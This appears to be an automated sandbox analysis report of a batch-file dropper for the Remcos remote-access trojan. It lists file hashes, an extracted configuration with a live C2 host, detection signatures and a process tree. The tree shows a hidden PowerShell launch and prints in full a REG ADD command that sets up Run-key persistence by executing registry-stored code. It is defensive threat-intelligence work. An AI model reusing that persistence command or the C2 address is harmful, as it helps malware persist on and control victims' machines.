Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240729-en locale:en-us os:windows7-x64 system
  • submitted
    22/10/2024, 05:01

General

  • Target

    rEXSP5634HISP9005STMSDSDOKUME74247linierelet.bat

  • Size

    5KB

  • MD5

    e6e618c4354c26c555872d5398a72086

  • SHA1

    76cddb6019c5d76a96de461a85742d766feebca8

  • SHA256

    e0d9ebe414aca4f6d28b0f1631a969f9190b6fb2cf5599b99ccfc6b7916ed8b3

  • SHA512

    0251b7c4f32ad218628d5e71bd80f909e4c124420e47e434b622e280253189e615206d6f6846ac63d66af14500054f38b15f473f5725b541c6921c03e23fea87

  • SSDEEP

    96:/ZAmDvLJYo/4xtgIYzTSWteyhFeeOFXsQOEPoxFft7K3/XG3gWTE:amDzafszOaNCXPOkYjKPQgWI

Malware Config

Extracted

Family

remcos

Botnet

MISS Chy

C2

pelele.duckdns.org:51525

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-TXCR8B

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run PowerShell and hide display window.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\rEXSP5634HISP9005STMSDSDOKUME74247linierelet.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2584
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "<obfuscated PowerShell script removed>"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2528
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<obfuscated PowerShell script removed>"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2716
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3016
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1724
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:340

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\63NW3LQ18UZCH0ARNVFL.temp

    Filesize

    7KB

    MD5

    ec04c921456b58beb806199c5487662d

    SHA1

    f67af045a196eb02742345be87119640b26d2883

    SHA256

    f4e45c32bee6bb058cd0ccd742043264de2f77295ce0a6ce382269d6db5bcd68

    SHA512

    3508b043c4f42de94b2a5da759bd1df0bdf51c55a8b0b83c40ee6b6182bce82ebc8a43ba895154525af7983f30249af8b7d7f1cf2ac159e3457caeb72b1dfd40

  • C:\Users\Admin\AppData\Roaming\Overtidsbetalings.Del

    Filesize

    487KB

    MD5

    2bddc5ba5ca1835b93004447e25041e5

    SHA1

    f494fc24f0056c569750f90f8325b6cc011919d2

    SHA256

    e28a506c658753a74aec3611452c57cb09c8c4da75d285661ac1a6450a1d4afd

    SHA512

    13f77faecbc1b255e04684ac3732f14f156281c17b961275523073a20f98bc029430cbc7adb6ae9848f2823035eeab31758e9790a018f46627ffb04fa0643515
